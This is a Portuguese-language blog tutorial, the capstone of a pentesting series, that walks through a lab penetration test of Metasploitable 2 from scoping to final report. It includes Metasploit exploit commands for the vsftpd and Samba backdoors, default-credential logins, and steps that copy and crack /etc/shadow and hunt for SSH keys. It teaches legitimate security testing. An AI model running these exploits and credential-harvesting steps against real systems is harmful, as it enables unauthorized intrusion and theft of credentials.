Menu
Início Artigos {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} Sobre Trabalhe Comigo
Security operations center
Segurança 8 mar, 2026 • 30 min de leitura

A Auditoria Completa: Um Teste de Penetração do Início ao Fim

Put it all together. Walk through a complete penetration test from scoping to final report. The capstone of The Hacker's Path series.

Compartilhar:
Lee Foropoulos

Lee Foropoulos

30 min de leitura

Continue where you left off?
Text size:

Contents

O Caminho do Hacker: Série de 5 Partes

Parte 1: IntroduçãoParte 2: Domínio do FlipperParte 3: Fundamentos do KaliParte 4: ExploraçãoParte 5: A Auditoria Completa

Você começou esta série se perguntando o que os hackers realmente fazem. Aprendeu que não é sobre capuzes e texto verde. É resolução metódica de problemas. Você clonou crachás, mapeou redes, capturou handshakes e obteve shells em máquinas vulneráveis.

Agora juntamos tudo. Este artigo o guia por um teste de penetração completo contra um alvo fictício. Cada fase, cada decisão, cada descoberta, documentada exatamente como um profissional faria.

O Cenário

Cliente: Initech Labs (uma pequena empresa de tecnologia fictícia)

Escopo: Teste de penetração de rede interna

Objetivo: Identificar vulnerabilidades e demonstrar o impacto potencial nos negócios

Seu alvo: Sua própria rede de laboratório (Kali + Metasploitable 2 + quaisquer outras VMs que configurou)

Prepare um café. Vai ser divertido.

Fase 1: Pré-Engajamento

Antes de tocar em um teclado, pentesters profissionais lidam com o lado comercial. Pule isso, e você não é um pentester. É apenas alguém cometendo crimes.

A Chamada de Escopo

Em um engajamento real, você teria uma chamada com o cliente para entender:

  • O que está no escopo? Quais redes, faixas de IP, aplicações?
  • O que está fora do escopo? Sistemas de produção? Serviços de terceiros?
  • Janela de teste? Quando pode testar? Apenas horário comercial?
  • Pontos de contato? Para quem liga se algo quebrar?
  • Objetivos? Conformidade ou melhoria real de segurança?

Para Seu Laboratório

Escopo: Apenas sua rede de laboratório isolada. Fora do escopo: Todo o resto. Janela de teste: Quando quiser. Objetivo: Aprender fazendo.

Regras de Engajamento

Engajamentos reais têm regras escritas:

  • Carta de autorização - Documento assinado provando que você tem permissão
  • Procedimentos de escalação - O que fazer se encontrar algo crítico
  • Tratamento de dados - Como lidar com dados sensíveis encontrados
  • Requisitos de limpeza - Remover todas as ferramentas e backdoors ao terminar
  • Prazo do relatório - Quando o relatório final deve ser entregue?

Sempre Obtenha Permissão por Escrito

Mesmo para testes "amigáveis" na rede de um amigo. Um email assinado dizendo "você tem permissão para testar minha rede de DATA a DATA" pode ser a diferença entre uma experiência de aprendizado e uma condenação criminal. Leve isso a sério.

Fase 2: Reconhecimento

Hora de aprender tudo sobre o alvo. Em um engajamento real, incluiria OSINT: buscas no Google, perfis do LinkedIn, sites da empresa, registros DNS. Para nosso laboratório, vamos direto ao reconhecimento ativo.

Passo 1: Descoberta de Rede

bash
ip a | grep inet
sudo nmap -sn 192.168.56.0/24 -oA discovery

Documente tudo:

text
1# Initech Labs - Descoberta de Rede
2# Data: 2026-03-08
3# Testador: Seu Nome
4
5192.168.56.1   - Gateway/Router
6192.168.56.101 - Desconhecido (a investigar)
7192.168.56.102 - Desconhecido (a investigar)

Passo 2: Varredura de Portas

bash
sudo nmap -sV -sC -p- -oA full_scan 192.168.56.101
sudo nmap -sV -sC --top-ports 1000 -oA quick_scan 192.168.56.101

No Metasploitable 2, você verá um tesouro:

text
1PORT     STATE SERVICE     VERSION
221/tcp   open  ftp         vsftpd 2.3.4
322/tcp   open  ssh         OpenSSH 4.7p1
423/tcp   open  telnet      Linux telnetd
525/tcp   open  smtp        Postfix smtpd
680/tcp   open  http        Apache httpd 2.2.8
7139/tcp  open  netbios-ssn Samba smbd 3.X
8445/tcp  open  netbios-ssn Samba smbd 3.X
93306/tcp open  mysql       MySQL 5.0.51a
105432/tcp open  postgresql  PostgreSQL DB
11...

Que exposição. Atualize as notas:

text
1192.168.56.101 - Servidor Linux (Metasploitable)
2  - FTP (21): vsftpd 2.3.4       # Backdoor conhecido!
3  - SSH (22): OpenSSH 4.7p1      # Antigo
4  - Telnet (23): Ativo            # Por que isso existe em 2026?
5  - HTTP (80): Apache 2.2.8      # Apps web para testar
6  - SMB (139/445): Samba 3.X     # Mina de ouro potencial
7  - MySQL (3306): 5.0.51a        # Acesso ao banco?
8  - PostgreSQL (5432): Ativo     # Outro BD

Passo 3: Identificação de Vulnerabilidades

bash
1sudo nmap --script vuln -oA vuln_scan 192.168.56.101
2msfconsole
3msf6 > search vsftpd
4msf6 > search samba 3

O backdoor do vsftpd 2.3.4 salta aos olhos imediatamente. É um shell garantido. Mas um bom pentester não para na primeira descoberta.

Sala de servidores com equipamentos de rede piscando
O reconhecimento completo mapeia toda a superfície de ataque antes de disparar um único exploit. Cada porta aberta e versão de serviço se torna um ponto de dados na sua avaliação.

Fase 3: Exploração

Aqui as coisas ficam empolgantes. Temos múltiplos pontos de entrada. Vamos trabalhar sistematicamente.

Vetor de Ataque 1: Backdoor FTP

bash
1msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
2msf6 exploit(...) > set RHOSTS 192.168.56.101
3msf6 exploit(...) > exploit
4
5[+] Backdoor service has been spawned
6[+] Command shell session 1 opened
7
8whoami
9root
Shell root obtido via backdoor FTP. Tempo da primeira varredura ao comprometimento total: aproximadamente 10 minutos.

Vetor de Ataque 2: Samba

bash
1msf6 > use exploit/multi/samba/usermap_script
2msf6 exploit(...) > set RHOSTS 192.168.56.101
3msf6 exploit(...) > exploit
4
5whoami
6root

Outro shell root por um vetor diferente. Dois caminhos independentes para comprometimento total.

Vetor de Ataque 3: Aplicações Web

bash
gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/dirb/common.txt
nikto -h http://192.168.56.101

phpMyAdmin com credenciais padrão: root com senha em branco. Acesso de administrador ao banco de dados sem senha.

Vetor de Ataque 4: Credenciais SSH Fracas

bash
1msf6 > use auxiliary/scanner/ssh/ssh_login
2msf6 auxiliary(...) > set RHOSTS 192.168.56.101
3msf6 auxiliary(...) > set USERNAME msfadmin
4msf6 auxiliary(...) > set PASSWORD msfadmin
5msf6 auxiliary(...) > run
6
7[+] 192.168.56.101:22 - Success: 'msfadmin:msfadmin'

Fase 4: Pós-Exploração

Temos acesso. Um teste de penetração real demonstra o impacto nos negócios.

Coleta de Credenciais

bash
1cat /etc/shadow
2cat /etc/passwd > /tmp/passwd.txt
3cat /etc/shadow > /tmp/shadow.txt
4unshadow passwd.txt shadow.txt > combined.txt
5john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt

Reconhecimento de Rede (De Dentro)

bash
1ifconfig
2route -n
3netstat -tulpn
4find / -name "id_rsa" 2>/dev/null

Descoberta de Dados Sensíveis

bash
1find / -name "*.conf" 2>/dev/null | head -20
2find / -name "*password*" 2>/dev/null
3mysql -u root -p
4mysql> SHOW DATABASES;

Escalação de Privilégios (de msfadmin)

bash
1ssh [email protected]
2sudo -l
3find / -perm -4000 2>/dev/null
4cat /etc/crontab
Profissional trabalhando com ferramentas de cibersegurança
A pós-exploração demonstra o impacto real nos negócios. A diferença entre uma varredura de vulnerabilidades e um teste de penetração é provar o que um atacante pode realmente fazer com o acesso.

Fase 5: Documentação e Descobertas

O teste é inútil sem relatório.

Resumo das Descobertas

CRÍTICO: Backdoor no Serviço FTP (CVE-2011-2523)

Sistema Afetado: 192.168.56.101 | Risco: Execução remota de código não autenticada como root | Recomendação: Atualizar vsftpd imediatamente ou desabilitar o serviço FTP.

CRÍTICO: Execução Remota de Código Samba

Sistema Afetado: 192.168.56.101 | Recomendação: Atualizar Samba. Restringir acesso SMB.

ALTO: Acesso Root MySQL Sem Senha

Recomendação: Definir senha root forte. Restringir phpMyAdmin.

ALTO: Credenciais SSH Fracas

Recomendação: Implementar política de senhas fortes. Autenticação SSH baseada em chave.

MÉDIO: Serviço Telnet Habilitado

Recomendação: Desabilitar Telnet. Usar SSH.

BAIXO: Página phpinfo() Exposta

Recomendação: Remover ou restringir acesso.

Resumo Executivo

A equipe de segurança obteve controle administrativo completo do servidor principal em 10 minutos.

10 min
Tempo da primeira varredura ao comprometimento root completo em um servidor com serviços desatualizados.
  • 2 vulnerabilidades críticas permitindo controle remoto imediato
  • 2 problemas de alta severidade expondo bancos de dados e credenciais
  • Múltiplas descobertas médias e baixas indicando falhas sistêmicas

Fase 6: Limpeza e Encerramento

bash
1msf6 > sessions -K
2rm /tmp/linpeas.sh
3rm /tmp/*.txt
4userdel testuser
5rm /home/*/.ssh/authorized_keys

Checklist Metodológica Completa

Metodologia de Teste de Penetração

  1. Pré-Engajamento - Definir escopo, obter autorização escrita, configurar ambiente
  2. Reconhecimento - Descoberta de rede, varredura de portas, identificação de vulnerabilidades
  3. Exploração - Validar e explorar vulnerabilidades, documentar, capturar evidências
  4. Pós-Exploração - Coleta de credenciais, dados sensíveis, escalação de privilégios
  5. Relatório - Resumo executivo, descobertas com evidências, recomendações
  6. Limpeza - Remover ferramentas, fechar sessões, documentar mudanças
Plano de Ação da Auditoria Completa 0/6

O Que Vem a Seguir: Seu Caminho

Você completou O Caminho do Hacker. Passou de "o que significa hacking?" para conduzir um teste de penetração completo.

Plataformas de Prática

  • Hack The Box - Máquinas realistas. Comece com boxes "Fáceis" aposentados.
  • TryHackMe - Caminhos de aprendizado guiados.
  • VulnHub - VMs vulneráveis gratuitas.
  • PentesterLab - Foco em segurança de aplicações web.

Certificações

  • eJPT - Excelente ponto de partida, exame prático
  • OSCP - Padrão da indústria, brutal mas respeitado
  • PNPT - Moderno, prático, inclui escrita de relatório
  • CEH - Para requisitos corporativos, menos prático

Especializações

  • Segurança de Aplicações Web - OWASP, Burp Suite, SQL injection, XSS
  • Active Directory - A maioria dos ambientes corporativos o utiliza
  • Segurança em Nuvem - Pentesting AWS, Azure, GCP
  • Segurança Móvel - Testes de aplicações Android/iOS
  • Red Teaming - Simulação completa de adversário
  • Engenharia Reversa - Análise de malware, desenvolvimento de exploits

Construa Seu Laboratório Doméstico

  • Adicione Windows Server com Active Directory
  • Configure um domain controller
  • Implante aplicações web vulneráveis (DVWA, bWAPP, WebGoat)
  • Construa uma rede com múltiplos segmentos
  • Adicione HoneyAegis para ver ataques da perspectiva do defensor

O Caminho do Hacker: Completo

Você conseguiu. Todas as cinco partes, de curioso a capaz.

Parte 1: Introdução Parte 2: Domínio do Flipper Parte 3: Fundamentos do Kali Parte 4: Exploração Parte 5: A Auditoria Completa

Série Completa - Sua Jornada

Parte 1: Aprendeu o que hacking realmente é e obteve suas primeiras vitórias com o Flipper Zero

Parte 2: Dominou cada protocolo Flipper: Sub-GHz, RFID, NFC, BadUSB, GPIO

Parte 3: Construiu seu laboratório Kali, aprendeu nmap e capturou handshakes WiFi

Parte 4: Dominou Metasploit, exploração, escalação de privilégios e pivoting

Parte 5: Juntou tudo em uma metodologia completa de teste de penetração

Segurança não é um destino. É uma prática. As ferramentas mudarão, as vulnerabilidades evoluirão, mas a metodologia permanece. Questione tudo. Documente tudo. Nunca pare de aprender.

Bem-vindo ao outro lado.

  • Lee
How was this article?

Compartilhar

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Nao perca nenhuma publicacao

Receba notificacoes quando novos artigos forem publicados. Sem necessidade de email.

Voce vera um banner no site quando houver um novo post, alem de uma notificacao do navegador se permitir.

Apenas notificacoes do navegador. Sem spam.

0 / 0